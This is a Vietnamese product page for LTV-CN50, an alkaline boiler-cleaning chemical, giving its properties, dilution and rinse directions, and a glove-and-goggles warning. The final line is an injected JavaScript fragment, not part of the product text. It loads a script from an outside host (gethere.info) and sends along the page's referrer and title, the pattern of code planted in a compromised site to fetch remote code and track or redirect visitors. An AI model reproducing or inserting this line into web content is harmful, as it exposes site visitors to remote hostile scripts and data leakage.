Mon,18-06-2018

HOÁ CHẤT TRUNG HOÀ - LTV-CN50

Hoá chất tẩy lò hơi LTV CN50 là một hỗn hợp các chất gốc kiềm, được sử dụng để tiếp tục loại bỏ cáu cặn và trung hòa axit dư để thụ động hóa bề mặt kim loại sau khi xử lý bằng hoá chất tẩy lò hơi LTV CL32.

1. Giới thiệu hoá chất tẩy lò hơi

Hoá chất tẩy lò hơi LTV CN50 là một hỗn hợp các chất gốc kiềm, được sử dụng để tiếp tục loại bỏ cáu cặn và trung hòa axit dư để thụ động hóa bề mặt kim loại sau khi xử lý bằng LTV CL32. 
  Tính chất: 
Cảm quan : Chất lỏng không màu, nhớt. 
pH 1%       : 13 - 14 
Tỷ trọng     : 1.2  
 
2. Ứng dụng hoá chất tẩy lò hơi
Hoá chất tẩy lò hơi LTV CN50 được pha loãng tùy từng trường hợp cụ thể sao cho giá trị pH lớn hơn 10.5 và được tuần hoàn liên tục trong hệ thống khoảng 2 đến 3 giờ. Sau đó, rửa kỹ lại hệ thống bằng nước sạch đến khi nước xả bỏ không màu và pH trung tính.  
Chú ý: Hoá chất tẩy lò hơi LTV CN50 là chất kiềm mạnh, tránh tiếp xúc lâu với da, phải sử dụng găng tay và kính mắt khi tiếp xúc với sản phẩm. 
  
3. Ích lợi của hoá chất tẩy lò hơi: 
Sản phẩm dạng lỏng rất dễ sử dụng 
Chỉ cần pha loãng với nước trước khi dùng. 
Loại bỏ một phần cáu cặn và thụ động hóa bề mặt kim loại. 
 
4. Những thông tin khác: 
Hoá chất tẩy lò hơi LTV CN50 là hỗn hợp của hydroxyte và các chất không có hại khác
 
Thông tin tham khảo chi tiết: LTV-CN50, MSDS (EL) , LTV CN50, MSDS (VN) , LTV-CN50, PDS (EL) , LTV-CN50, PDS (VN)
 

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';